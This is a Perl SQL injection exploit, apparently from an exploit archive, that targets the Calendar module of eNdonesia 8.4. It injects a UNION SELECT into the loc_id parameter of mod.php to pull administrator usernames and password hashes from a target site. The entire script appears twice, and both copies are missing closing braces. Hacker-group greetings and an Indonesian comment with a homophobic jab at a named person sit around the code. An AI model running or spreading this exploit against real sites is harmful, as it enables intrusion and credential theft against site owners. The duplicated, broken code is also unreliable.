eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit
#| /-----------------------------------------\ |
#| | Remote SQL Exploit | |
#| | eNdonesia 8.4 Remote SQL Exploit | |
#| | www.endonesia.org | |
#| | Calendar Module | |
#| \-----------------------------------------/ |
#| /-----------------------------------------\ |
#| | Presented By Jack | |
#| | MainHack Enterprise | |
#| | www.MainHack.com & irc.nob0dy.net | |
#| | #MainHack #nob0dy #BaliemHackerlink | |
#| | Jack[at]MainHack[dot]com | |
#| \-----------------------------------------/ |
#| /-----------------------------------------\ |
#| | Hello To: Indonesian h4x0r | |
#| | yadoy666,n0c0py & okedeh | |
#| | VOP Crew [Vaksin13,OoN_BoY,Paman] | |
#| | NoGe,str0ke,H312Y,s3t4n,[S]hiro,frull | |
#| | all MainHack BrotherHood | |
#| \-----------------------------------------/ |
use HTTP::Request;
use LWP::UserAgent;
$sql_vulnerable = "/mod.php?mod=calendar&op=list_events&loc_id=";
$sql_injection = "-999/**/union select/**/0x3a,0x3a,concat(aid,0x3a,pwd),0x3a,concat(name,0x3a,pwd)/**/from/**/authors/*where name pwd";
if(!@ARGV) { &help;exit(1);}
sub help(){
print "\n [?] eNdonesia 8.4 Remote SQL Exploit\n";
print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print " [?] Use : perl $0 www.target.com\n";
print " [?] Dont use \"http://\"\n";
print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print " [?] Baliem Hacker - VOP crew - MainHack BrotherHood \n\n";
print " [?] www.MainHack.com\n\n";
while (){
my $target = $ARGV[0];
my $exploit = "http://".$target.$sql_vulnerable.$sql_injection;
print "\n [-] Trying to inject $target ...\n\n";
my $request = HTTP::Request->new(GET=>$exploit);
my $useragent = LWP::UserAgent->new();
my $response = $useragent->request($request);
if ($response->is_success){
my $res = $response->content;
if ($res =~ m/\>([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) {
my ($username,$passwd) = ($1,$2);
print " [target] $target \n";
print " [loginx] $username:$passwd \n\n";
else {
die " [error] Fail to get username and password.\n\n";
else {
die " [error] Fail to inject $target \n\n";
#| NoGay kalo kita artikan sepintas berarti Tidak ada Gay |
#| namun mari kita perhatikan secara seksama ... |
#| NoGay merupakan kependekan dari NoGe is Gay. |
#| Sungguh, penyembunyian sebuah karakter di balik makna kata. |
#Vendor Has been contacted and now working for it.
#| /-----------------------------------------\ |
#| | Remote SQL Exploit | |
#| | eNdonesia 8.4 Remote SQL Exploit | |
#| | www.endonesia.org | |
#| | Calendar Module | |
#| \-----------------------------------------/ |
#| /-----------------------------------------\ |
#| | Presented By Jack | |
#| | MainHack Enterprise | |
#| | www.MainHack.com & irc.nob0dy.net | |
#| | #MainHack #nob0dy #BaliemHackerlink | |
#| | Jack[at]MainHack[dot]com | |
#| \-----------------------------------------/ |
#| /-----------------------------------------\ |
#| | Hello To: Indonesian h4x0r | |
#| | yadoy666,n0c0py & okedeh | |
#| | VOP Crew [Vaksin13,OoN_BoY,Paman] | |
#| | NoGe,str0ke,H312Y,s3t4n,[S]hiro,frull | |
#| | all MainHack BrotherHood | |
#| \-----------------------------------------/ |
use HTTP::Request;
use LWP::UserAgent;
$sql_vulnerable = "/mod.php?mod=calendar&op=list_events&loc_id=";
$sql_injection = "-999/**/union select/**/0x3a,0x3a,concat(aid,0x3a,pwd),0x3a,concat(name,0x3a,pwd)/**/from/**/authors/*where name pwd";
if(!@ARGV) { &help;exit(1);}
sub help(){
print "\n [?] eNdonesia 8.4 Remote SQL Exploit\n";
print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print " [?] Use : perl $0 www.target.com\n";
print " [?] Dont use \"http://\"\n";
print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print " [?] Baliem Hacker - VOP crew - MainHack BrotherHood \n\n";
print " [?] www.MainHack.com\n\n";
while (){
my $target = $ARGV[0];
my $exploit = "http://".$target.$sql_vulnerable.$sql_injection;
print "\n [-] Trying to inject $target ...\n\n";
my $request = HTTP::Request->new(GET=>$exploit);
my $useragent = LWP::UserAgent->new();
my $response = $useragent->request($request);
if ($response->is_success){
my $res = $response->content;
if ($res =~ m/\>([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) {
my ($username,$passwd) = ($1,$2);
print " [target] $target \n";
print " [loginx] $username:$passwd \n\n";
else {
die " [error] Fail to get username and password.\n\n";
else {
die " [error] Fail to inject $target \n\n";
#| NoGay kalo kita artikan sepintas berarti Tidak ada Gay |
#| namun mari kita perhatikan secara seksama ... |
#| NoGay merupakan kependekan dari NoGe is Gay. |
#| Sungguh, penyembunyian sebuah karakter di balik makna kata. |
#Vendor Has been contacted and now working for it.